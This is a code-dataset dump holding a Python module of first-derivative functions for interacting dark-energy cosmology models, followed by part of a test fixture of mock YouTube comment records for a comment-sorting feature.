zprev versions/firstderivs1.py
|
lefthandedroo/Cosmodels
|
c355d18021467cf92546cf2fc9cb1d1abe59b8d8
|
[
"MIT"
] | null | null | null |
zprev versions/firstderivs1.py
|
lefthandedroo/Cosmodels
|
c355d18021467cf92546cf2fc9cb1d1abe59b8d8
|
[
"MIT"
] | null | null | null |
zprev versions/firstderivs1.py
|
lefthandedroo/Cosmodels
|
c355d18021467cf92546cf2fc9cb1d1abe59b8d8
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 15 13:23:25 2018
@author: BallBlueMeercat
"""
import numpy as np
# Eq of state parameters for known fluids:
w_r = 1/3 # radiation
w_m = 0.0 # matter
w_de = -1.0 # cosmological constant (dark energy?)
def expgamma(v, t, gamma, H0):
"""
Takes in:
v = values at z=0;
t = list of redshifts to integrate over;
gamma = interaction term.
Returns a function f = [dt/dz, d(a)/dz,
d(e'_m)/dz, d(e'_de)/dz,
d(z)/dz,
d(dl)/dz]
"""
(t, a, ombar_m, ombar_de, z, dl) = v
Hz = H0 * (ombar_m + ombar_de)**(1/2)
if np.isnan(Hz):
print('expgamma')
print('z = %s, Hz = %s, gamma = %s, ombar_m = %s, ombar_de = %s'
%(z, Hz, gamma, ombar_m, ombar_de))
irate = (1-np.exp(gamma))*(1-ombar_de/(ombar_de+ombar_m)) /(1+z)/Hz
# first derivatives of functions I want to find:
f = [# dt/dz (= f.d wrt z of time)
-1/((1+z) * Hz),
# d(a)/dz (= f.d wrt z of scale factor)
-(1+z)**(-2),
# d(ombar_m)/dz (= f.d wrt z of density_m(t) / crit density(t0))
3*ombar_m /(1+z) - irate,
# d(ombar_de)/dz (= f.d wrt z of density_de(t) / crit desnity(t0))
irate,
# d(z)/dz (= f.d wrt z of redshift)
1,
# d(dl)/dz (= f.d wrt z of luminosty distance)
1/Hz] # H + Hdz*(1+z)
return f
def txgamma(v, t, gamma, H0):
"""
Takes in:
v = values at z=0;
t = list of redshifts to integrate over;
gamma = interaction term.
Returns a function f = [dt/dz, d(a)/dz,
d(e'_m)/dz, d(e'_de)/dz,
d(z)/dz,
d(dl)/dz]
"""
(t, a, ombar_m, ombar_de, z, dl) = v #omegam, omegade, z, dl) = v
Hz = H0 * (ombar_m + ombar_de)**(1/2)
if np.isnan(Hz):
print('txgamma')
print('z = %s, Hz = %s, gamma = %s, ombar_m = %s, ombar_de = %s'
%(z, Hz, gamma, ombar_m, ombar_de))
irate = (gamma/(-t+0.0001))*(1-ombar_de/(ombar_de+ombar_m)) /(1+z)/Hz
# first derivatives of functions I want to find:
f = [# dt/dz (= f.d wrt z of time)
-1/((1+z) * Hz),
# d(a)/dz (= f.d wrt z of scale factor)
-(1+z)**(-2),
# d(ombar_m)/dz (= f.d wrt z of density_m(t) / crit density(t0))
3*ombar_m /(1+z) - irate,
# d(ombar_de)/dz (= f.d wrt z of density_de(t) / crit desnity(t0))
irate,
# d(z)/dz (= f.d wrt z of redshift)
1,
# d(dl)/dz (= f.d wrt z of luminosty distance)
1/Hz] # H + Hdz*(1+z)
return f
def zxgamma(v, t, gamma, H0):
"""
Takes in:
v = values at z=0;
t = list of redshifts to integrate over;
gamma = interaction term.
Returns a function f = [dt/dz, d(a)/dz,
d(e'_m)/dz, d(e'_de)/dz,
d(z)/dz,
d(dl)/dz]
"""
(t, a, ombar_m, ombar_de, z, dl) = v #omegam, omegade, z, dl) = v
Hz = H0 * (ombar_m + ombar_de)**(1/2)
if np.isnan(Hz):
print('zxgamma')
print('z = %s, Hz = %s, gamma = %s, ombar_m = %s, ombar_de = %s'
%(z, Hz, gamma, ombar_m, ombar_de))
irate = z*gamma*(1-ombar_de/(ombar_de+ombar_m)) /(1+z)/Hz
# first derivatives of functions I want to find:
f = [# dt/dz (= f.d wrt z of time)
-1/((1+z) * Hz),
# d(a)/dz (= f.d wrt z of scale factor)
-(1+z)**(-2),
# d(ombar_m)/dz (= f.d wrt z of density_m(t) / crit density(t0))
3*ombar_m /(1+z) - irate,
# d(ombar_de)/dz (= f.d wrt z of density_de(t) / crit desnity(t0))
irate,
# d(z)/dz (= f.d wrt z of redshift)
1,
# d(dl)/dz (= f.d wrt z of luminosty distance)
1/Hz] # H + Hdz*(1+z)
return f
def gamma_over_z(v, t, gamma, H0):
"""
Takes in:
v = values at z=0;
t = list of redshifts to integrate over;
gamma = interaction term.
Returns a function f = [dt/dz, d(a)/dz,
d(e'_m)/dz, d(e'_de)/dz,
d(z)/dz,
d(dl)/dz]
"""
(t, a, ombar_m, ombar_de, z, dl) = v #omegam, omegade, z, dl) = v
Hz = H0 * (ombar_m + ombar_de)**(1/2)
if np.isnan(Hz):
print('gamma_over_z')
print('z = %s, Hz = %s, gamma = %s, ombar_m = %s, ombar_de = %s'
%(z, Hz, gamma, ombar_m, ombar_de))
irate = gamma/(z + 0.01)*(1-ombar_de/(ombar_de+ombar_m)) /(1+z)/Hz
# first derivatives of functions I want to find:
f = [# dt/dz (= f.d wrt z of time)
-1/((1+z) * Hz),
# d(a)/dz (= f.d wrt z of scale factor)
-(1+z)**(-2),
# d(ombar_m)/dz (= f.d wrt z of density_m(t) / crit density(t0))
3*ombar_m /(1+z) - irate,
# d(ombar_de)/dz (= f.d wrt z of density_de(t) / crit desnity(t0))
irate,
# d(z)/dz (= f.d wrt z of redshift)
1,
# d(dl)/dz (= f.d wrt z of luminosty distance)
1/Hz] # H + Hdz*(1+z)
return f
def zxxgamma(v, t, gamma, H0):
"""
Takes in:
v = values at z=0;
t = list of redshifts to integrate over;
gamma = interaction term.
Returns a function f = [dt/dz, d(a)/dz,
d(e'_m)/dz, d(e'_de)/dz,
d(z)/dz,
d(dl)/dz]
"""
(t, a, ombar_m, ombar_de, z, dl) = v #omegam, omegade, z, dl) = v
Hz = H0 * (ombar_m + ombar_de)**(1/2)
if np.isnan(Hz):
print('zxxgamma')
print('z = %s, Hz = %s, gamma = %s, ombar_m = %s, ombar_de = %s'
%(z, Hz, gamma, ombar_m, ombar_de))
irate = (z**gamma)*(1-ombar_de/(ombar_de+ombar_m)) /(1+z)/Hz
# first derivatives of functions I want to find:
f = [# dt/dz (= f.d wrt z of time)
-1/((1+z) * Hz),
# d(a)/dz (= f.d wrt z of scale factor)
-(1+z)**(-2),
# d(ombar_m)/dz (= f.d wrt z of density_m(t) / crit density(t0))
3*ombar_m /(1+z) - irate,
# d(ombar_de)/dz (= f.d wrt z of density_de(t) / crit desnity(t0))
irate,
# d(z)/dz (= f.d wrt z of redshift)
1,
# d(dl)/dz (= f.d wrt z of luminosty distance)
1/Hz] # H + Hdz*(1+z)
return f
def gammaxxz(v, t, gamma, H0):
"""
Takes in:
v = values at z=0;
t = list of redshifts to integrate over;
gamma = interaction term.
Returns a function f = [dt/dz, d(a)/dz,
d(e'_m)/dz, d(e'_de)/dz,
d(z)/dz,
d(dl)/dz]
"""
(t, a, ombar_m, ombar_de, z, dl) = v #omegam, omegade, z, dl) = v
Hz = H0 * (ombar_m + ombar_de)**(1/2)
if np.isnan(Hz):
print('gammaxxz')
print('z = %s, Hz = %s, gamma = %s, ombar_m = %s, ombar_de = %s'
%(z, Hz, gamma, ombar_m, ombar_de))
irate = (gamma**z)*(1-ombar_de/(ombar_de+ombar_m)) /(1+z)/Hz
# first derivatives of functions I want to find:
f = [# dt/dz (= f.d wrt z of time)
-1/((1+z) * Hz),
# d(a)/dz (= f.d wrt z of scale factor)
-(1+z)**(-2),
# d(ombar_m)/dz (= f.d wrt z of density_m(t) / crit density(t0))
3*ombar_m /(1+z) - irate,
# d(ombar_de)/dz (= f.d wrt z of density_de(t) / crit desnity(t0))
irate,
# d(z)/dz (= f.d wrt z of redshift)
1,
# d(dl)/dz (= f.d wrt z of luminosty distance)
1/Hz] # H + Hdz*(1+z)
return f
def rdecay_m(v, t, gamma, H0):
"""
Takes in:
v = values at z=0;
t = list of redshifts to integrate over;
gamma = interaction term;
H0 = Hubble constant ar z=0.
Returns a function f = [dt/dz, d(a)/dz,
d(e'_m)/dz, d(e'_de)/dz,
d(z)/dz,
d(dl)/dz]
"""
(t, a, ombar_m, ombar_de, z, dl) = v #omegam, omegade, z, dl) = v
Hz = H0 * (ombar_m + ombar_de)**(1/2)
if np.isnan(Hz):
print('rdecay_m')
print('z = %s, Hz = %s, gamma = %s, ombar_m = %s, ombar_de = %s'
%(z, Hz, gamma, ombar_m, ombar_de))
# rate of ombar change with redshift
irate = gamma*(1-ombar_m/(ombar_de+ombar_m)) /(1+z)/Hz
# first derivatives of functions I want to find:
f = [# dt/dz (= f.d wrt z of time)
-1/((1+z) * Hz),
# d(a)/dz (= f.d wrt z of scale factor)
-(1+z)**(-2),
# d(ombar_m)/dz (= f.d wrt z of density_m(t) / crit density(t0))
3*ombar_m /(1+z) - irate,
# d(ombar_de)/dz (= f.d wrt z of density_de(t) / crit desnity(t0))
irate,
# d(z)/dz (= f.d wrt z of redshift)
1,
# d(dl)/dz (= f.d wrt z of luminosty distance)
1/Hz] # H + Hdz*(1+z)
return f
def rdecay_de(v, t, gamma, H0):
"""
Takes in:
v = values at z=0;
t = list of redshifts to integrate over;
gamma = interaction term;
H0 = Hubble constant ar z=0.
Returns a function f = [dt/dz, d(a)/dz,
d(e'_m)/dz, d(e'_de)/dz,
d(z)/dz,
d(dl)/dz]
"""
(t, a, ombar_m, ombar_de, z, dl) = v #omegam, omegade, z, dl) = v
Hz = H0 * (ombar_m + ombar_de)**(1/2)
if np.isnan(Hz):
print('rdecay_de')
print('z = %s, Hz = %s, gamma = %s, ombar_m = %s, ombar_de = %s'
%(z, Hz, gamma, ombar_m, ombar_de))
# rate of ombar change with redshift
irate = gamma*(1-ombar_de/(ombar_de+ombar_m)) /(1+z)/Hz
# first derivatives of functions I want to find:
f = [# dt/dz (= f.d wrt z of time)
-1/((1+z) * Hz),
# d(a)/dz (= f.d wrt z of scale factor)
-(1+z)**(-2),
# d(ombar_m)/dz (= f.d wrt z of density_m(t) / crit density(t0))
3*ombar_m /(1+z) - irate,
# d(ombar_de)/dz (= f.d wrt z of density_de(t) / crit desnity(t0))
irate,
# d(z)/dz (= f.d wrt z of redshift)
1,
# d(dl)/dz (= f.d wrt z of luminosty distance)
1/Hz] # H + Hdz*(1+z)
return f
def rdecay_mxde(v, t, gamma, H0):
"""
Takes in:
v = values at z=0;
t = list of redshifts to integrate over;
gamma = interaction term;
H0 = Hubble constant ar z=0.
Returns a function f = [dt/dz, d(a)/dz,
d(e'_m)/dz, d(e'_de)/dz,
d(z)/dz,
d(dl)/dz]
"""
(t, a, ombar_m, ombar_de, z, dl) = v #omegam, omegade, z, dl) = v
Hz = H0 * (ombar_m + ombar_de)**(1/2)
if np.isnan(Hz):
print('rdecay_mxde')
print('z = %s, Hz = %s, gamma = %s, ombar_m = %s, ombar_de = %s'
%(z, Hz, gamma, ombar_m, ombar_de))
# rate of ombar change with redshift
irate = gamma*ombar_de*ombar_m /(1+z)/Hz
# first derivatives of functions I want to find:
f = [# dt/dz (= f.d wrt z of time)
-1/((1+z) * Hz),
# d(a)/dz (= f.d wrt z of scale factor)
-(1+z)**(-2),
# d(ombar_m)/dz (= f.d wrt z of density_m(t) / crit density(t0))
3*ombar_m /(1+z) - irate,
# d(ombar_de)/dz (= f.d wrt z of density_de(t) / crit desnity(t0))
irate,
# d(z)/dz (= f.d wrt z of redshift)
1,
# d(dl)/dz (= f.d wrt z of luminosty distance)
1/Hz] # H + Hdz*(1+z)
return f
def rdecay(v, t, gamma, H0):
"""
Takes in:
v = values at z=0;
t = list of redshifts to integrate over;
gamma = interaction term;
H0 = Hubble constant at z=0.
Returns a function f = [dt/dz, d(a)/dz,
d(e'_m)/dz, d(e'_de)/dz,
d(z)/dz,
d(dl)/dz]
"""
(t, a, ombar_m, ombar_de, z, dl) = v #omegam, omegade, z, dl) = v
Hz = H0 * (ombar_m + ombar_de)**(1/2)
if np.isnan(Hz):
print('rdecay')
print('z = %s, Hz = %s, gamma = %s, ombar_m = %s, ombar_de = %s'
%(z, Hz, gamma, ombar_m, ombar_de))
# rate of ombar change with redshift
irate = gamma*ombar_de /(1+z)/Hz
# first derivatives of functions I want to find:
f = [# dt/dz (= f.d wrt z of time)
-1/((1+z) * Hz),
# d(a)/dz (= f.d wrt z of scale factor)
-(1+z)**(-2),
# d(ombar_m)/dz (= f.d wrt z of density_m(t) / crit density(t0))
3*ombar_m /(1+z) - irate,
# d(ombar_de)/dz (= f.d wrt z of density_de(t) / crit desnity(t0))
irate,
# d(z)/dz (= f.d wrt z of redshift)
1,
# d(dl)/dz (= f.d wrt z of luminosty distance)
1/Hz] # H + Hdz*(1+z)
return f
def interacting(v, t, gamma, H0):
"""
UNPHYSICAL FOR |gamma| > 0.1 BEFORE z = 2
Takes in:
v = values at z=0;
t = list of redshifts to integrate over;
gamma = interaction term.
Returns a function f = [dt/dz, d(a)/dz,
d(e'_m)/dz, d(e'_de)/dz,
d(z)/dz,
d(dl)/dz]
"""
(t, a, ombar_m, ombar_de, z, dl) = v #omegam, omegade, z, dl) = v
Hz = H0 * (ombar_m + ombar_de)**(1/2)
if np.isnan(Hz):
print('interacting')
print('z = %s, Hz = %s, gamma = %s, ombar_m = %s, ombar_de = %s'
%(z, Hz, gamma, ombar_m, ombar_de))
# first derivatives of functions I want to find:
f = [# dt/dz (= f.d wrt z of time)
-1/((1+z) * Hz),
# d(a)/dz (= f.d wrt z of scale factor)
-(1+z)**(-2),
# d(ombar_m)/dz (= f.d wrt z of density_m(t) / crit density(t0))
3*ombar_m /(1+z) - gamma/(1+z)/Hz,
# d(ombar_de)/dz (= f.d wrt z of density_de(t) / crit desnity(t0))
gamma/(1+z)/Hz,
# d(z)/dz (= f.d wrt z of redshift)
1,
# d(dl)/dz (= f.d wrt z of luminosty distance)
1/Hz] # H + Hdz*(1+z)
return f
def LCDM(v, t, H0):
"""
Takes in:
v = values at z=0;
t = list of redshifts to integrate over;
gamma = interaction term.
Returns a function f = [dt/dz, d(a)/dz,
d(e'_m)/dz, d(e'_de)/dz,
d(z)/dz,
d(dl)/dz]
"""
(t, a, ombar_m, ombar_de, z, dl) = v #omegam, omegade, z, dl) = v
Hz = H0 * (ombar_m + ombar_de)**(1/2)
if np.isnan(Hz):
print('LCDM')
print('z = %s, Hz = %s, gamma = %s, ombar_m = %s, ombar_de = %s'
%(z, Hz, ombar_m, ombar_de))
# first derivatives of functions I want to find:
f = [# dt/dz (= f.d wrt z of time)
-1/((1+z) * Hz),
# d(a)/dz (= f.d wrt z of scale factor)
-(1+z)**(-2),
# d(ombar_m)/dz (= f.d wrt z of density_m(t) / crit density(t0))
3*ombar_m /(1+z),
# d(ombar_de)/dz (= f.d wrt z of density_de(t) / crit desnity(t0))
0,
# d(z)/dz (= f.d wrt z of redshift)
1,
# d(dl)/dz (= f.d wrt z of luminosty distance)
1/Hz] # H + Hdz*(1+z)
return f
#def LCDM(v, z, H0):
# """
# Takes in:
# v = values at z=0;
# t = list of redshifts to integrate over;
# gamma = interaction term.
#
# Returns a function f = [dt/dz, d(a)/dz,
# d(e'_m)/dz, d(e'_de)/dz,
# d(z)/dz,
# d(dl)/dz]
# """
# (ombar_m, ombar_de, dl) = v #omegam, omegade, z, dl) = v
#
# Hz = H0 * (ombar_m + ombar_de)**(1/2)
#
# import numpy as np
# if np.isnan(Hz):
# print('z = %s, Hz = %s, gamma = %s, ombar_m = %s, ombar_de = %s'
# %(z, Hz, ombar_m, ombar_de))
#
# # fist derivatives of functions I want to find:
# f = [# d(ombar_m)/dz (= f.d wrt z of density_m(t) / crit density(t0))
# 3*ombar_m /(1+z),
#
# # d(ombar_de)/dz (= f.d wrt z of density_de(t) / crit desnity(t0))
# 0,
#
# # d(dl)/dz (= f.d wrt z of luminosty distance)
# 1/Hz] # H + Hdz*(1+z)
#
# return f
| 30.376689
| 76
| 0.421565
| 2,705
| 17,983
| 2.715712
| 0.043623
| 0.071876
| 0.040839
| 0.071467
| 0.94446
| 0.940512
| 0.940512
| 0.940512
| 0.935883
| 0.935883
| 0
| 0.025569
| 0.423678
| 17,983
| 592
| 77
| 30.376689
| 0.68323
| 0.520436
| 0
| 0.778351
| 0
| 0.061856
| 0.097905
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061856
| false
| 0
| 0.005155
| 0
| 0.128866
| 0.123711
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
11cf70b247c22683411349776adc6b297f4b5d0a
| 20,437
|
py
|
Python
|
Tests/test_integration/response_data_sort.py
|
duncanbackr/jit_analytics
|
9c81ff294459ccda5f3d3ace40dd5f5b44cfa4d1
|
[
"MIT"
] | null | null | null |
Tests/test_integration/response_data_sort.py
|
duncanbackr/jit_analytics
|
9c81ff294459ccda5f3d3ace40dd5f5b44cfa4d1
|
[
"MIT"
] | null | null | null |
Tests/test_integration/response_data_sort.py
|
duncanbackr/jit_analytics
|
9c81ff294459ccda5f3d3ace40dd5f5b44cfa4d1
|
[
"MIT"
] | null | null | null |
import datetime
mock_badge = [{'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJyK4xg31xlsnsA6SWZM_4XFBqKCvSzFp48kyhOaTHs=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15213, 'authorDisplayName': 'kate ramsay', 'commentDatePosted': datetime.datetime(2015, 10, 24, 17, 53, 29), 'commentID': 25925, 'textDisplay': 'this is one of my favourite songs', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJxhGNURpsRc4-wZa3PQwcmWOnq4K7fPTqjx53vb=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15179, 'authorDisplayName': 'Rowdy Mouse', 'commentDatePosted': datetime.datetime(2015, 11, 30, 13, 51), 'commentID': 25869, 'textDisplay': "One time Matt sang happy birthday to my girlfriend Esiri over the internet.\nThanks for that btw Matt. I've never been laid so hard in my life. Although she did yell your name a couple of times, hope you don't mind.", 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJzuzD3xT6MChz0e5AV4Ii3hoc3zSFQT3-vbQ7Fx4g=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15185, 'authorDisplayName': 'VeXeBB', 'commentDatePosted': datetime.datetime(2015, 11, 30, 12, 4, 6), 'commentID': 25879, 'textDisplay': 'I wish you were my vocal coach! Awesome Matt!', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJwXeAzbLHuG_I_R8flkD3VGm7OTBYKncPjJ2tv9rw=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 14733, 'authorDisplayName': 'Lukas van der Heul', 'commentDatePosted': datetime.datetime(2015, 11, 30, 12, 14, 24), 'commentID': 25877, 'textDisplay': 'BOOM! Another cool video of Matt Mulholland has arived in my subscribsion list! Love It!', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJzreDMwlepx-hd2mU5f4FCqT7Iall-AJoloA-9c=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 4045, 'authorDisplayName': 'P Elnerud', 'commentDatePosted': datetime.datetime(2015, 12, 2, 22, 33, 24), 'commentID': 25839, 'textDisplay': 'Yesss!', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJxd4wuBKZG4164EE1PQ2XjME6Q5WsuJ_MsfCA=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15211, 'authorDisplayName': 'Sporky0', 'commentDatePosted': datetime.datetime(2015, 10, 24, 22, 40, 8), 'commentID': 25920, 'textDisplay': "Love your videos Matt, always have. But it might just be me but the echo/reverb (whatever it was) on the voice was kinda annoying. It overshadowed your vocals and I found it difficult to listen to. \nI'm not trying to shit on you or the video, just sharing my opinion.", 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJzvOmnTsA91zWviyECT-sft2g_WlxThvvLP_m1oNuc=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 3974, 'authorDisplayName': 'David Lang', 'commentDatePosted': datetime.datetime(2015, 10, 24, 10, 21, 14), 'commentID': 25933, 'textDisplay': 'Delightful! Tasty Bones!', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJxLREJhsl7hGohv5C3S-zQWmDVnqFUOGFLTepE43w=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15171, 'authorDisplayName': 'Meaghan Kalinowski', 'commentDatePosted': datetime.datetime(2015, 12, 1, 0, 54, 18), 'commentID': 25847, 'textDisplay': 'labyrinth', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJwmB3fa5sJSlOT35rkWCVfZn85qwy_qsrY_u3AJ=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15205, 'authorDisplayName': 'Remelox', 'commentDatePosted': datetime.datetime(2015, 10, 28, 21, 44, 58), 'commentID': 25909, 'textDisplay': 'Nice to get this but upset to lose the How Long Can You Dance video.', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJymZVZeOBTgKkSaRTWFlQBw6nGuHgWE1HkmekCvww=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 14141, 'authorDisplayName': 'Junkmech', 'commentDatePosted': datetime.datetime(2015, 11, 30, 19, 27, 40), 'commentID': 25858, 'textDisplay': 'Let the panties hit the floor.', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}]
mock_retain = [{'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJwDyt4r0JGdXMdPYnGaXTwnUEkKtB8_Zxjiog=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 3896, 'authorDisplayName': 'BatmanShampoo', 'commentDatePosted': datetime.datetime(2015, 11, 30, 16, 16, 33), 'commentID': 25863, 'textDisplay': 'Amazing video as always! Keep up the awesome work bringing laughs and smiles!', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJzlMgqNHe3yvtxnRoWAmAT0mKTzncTHn9pobA=s48-c-k-c0xffffffff-no-rj-mo', 'badge': None, 'fanID': 15214, 'authorDisplayName': 'QuannanHade', 'commentDatePosted': datetime.datetime(2015, 10, 24, 11, 21, 9), 'commentID': 25931, 'textDisplay': 'Finally, two of my favourite youtubers combine into one powerful team.\n\nNow, you just need to introduce Chris to The Steinbenders.', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJwXeAzbLHuG_I_R8flkD3VGm7OTBYKncPjJ2tv9rw=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 14733, 'authorDisplayName': 'Lukas van der Heul', 'commentDatePosted': datetime.datetime(2015, 11, 30, 12, 14, 24), 'commentID': 25877, 'textDisplay': 'BOOM! Another cool video of Matt Mulholland has arived in my subscribsion list! Love It!', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJzvOmnTsA91zWviyECT-sft2g_WlxThvvLP_m1oNuc=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 3974, 'authorDisplayName': 'David Lang', 'commentDatePosted': datetime.datetime(2015, 10, 24, 10, 21, 14), 'commentID': 25933, 'textDisplay': 'Delightful! Tasty Bones!', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJymZVZeOBTgKkSaRTWFlQBw6nGuHgWE1HkmekCvww=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 14141, 'authorDisplayName': 'Junkmech', 'commentDatePosted': datetime.datetime(2015, 11, 30, 19, 27, 40), 'commentID': 25858, 'textDisplay': 'Let the panties hit the floor.', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJx4rJMozMawnopW_TwtW0d9YZ5f-551Xyh0Dw=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 13065, 'authorDisplayName': 'gml4', 'commentDatePosted': datetime.datetime(2015, 10, 24, 17, 6, 20), 'commentID': 25926, 'textDisplay': 'Wait a minute... I can only like this once?! This made me super happy to see you working with my favorite youtube trombonist... great collaboration. This one completely justifies my opinion that you are a very talented musician Matt.... thank you for sharing this, and all that you do.', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJz90VfgUZwHDDtihzUX_yTWMYdSf_dIx3O5Rw=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 12780, 'authorDisplayName': 'mynameismatt2010', 'commentDatePosted': datetime.datetime(2015, 12, 1, 1, 6, 46), 'commentID': 25846, 'textDisplay': "Awesome as always Matt! I'm wondering if you're planning on continuing to move more towards these more serious covers or if there will be more comedy videos to come? Either way your videos are always great!", 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJwgwf9bW8WM46uEg8ECRCuDD18Is4usviCrZCHv3g=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 3945, 'authorDisplayName': 'Michelle Karbon', 'commentDatePosted': datetime.datetime(2015, 11, 30, 19, 2, 1), 'commentID': 25859, 'textDisplay': "You're so awesome! I love this and we need another recorder by candlelight soon!", 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJyVben0E203Z_mgaX3OJ1s2QNgp3u5QcG21S_l2Jg=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 13453, 'authorDisplayName': 'Brigitta Sz.', 'commentDatePosted': datetime.datetime(2015, 10, 25, 6, 53, 34), 'commentID': 25916, 'textDisplay': 'Még mindig szuper hangod van :) jó lett a klip! BYEEEEEE XD', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJxnXmg4gIIRFy0PYKwS-Eb2400IR8Vwaj0Oow=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 13747, 'authorDisplayName': 'shikumaru55', 'commentDatePosted': datetime.datetime(2015, 10, 24, 11, 23, 13), 'commentID': 25930, 'textDisplay': "So you're not dead?", 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}]
mock_balance = [{'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJwDyt4r0JGdXMdPYnGaXTwnUEkKtB8_Zxjiog=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 3896, 'authorDisplayName': 'BatmanShampoo', 'commentDatePosted': datetime.datetime(2015, 11, 30, 16, 16, 33), 'commentID': 25863, 'textDisplay': 'Amazing video as always! Keep up the awesome work bringing laughs and smiles!', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJwXeAzbLHuG_I_R8flkD3VGm7OTBYKncPjJ2tv9rw=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 14733, 'authorDisplayName': 'Lukas van der Heul', 'commentDatePosted': datetime.datetime(2015, 11, 30, 12, 14, 24), 'commentID': 25877, 'textDisplay': 'BOOM! Another cool video of Matt Mulholland has arived in my subscribsion list! Love It!', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland 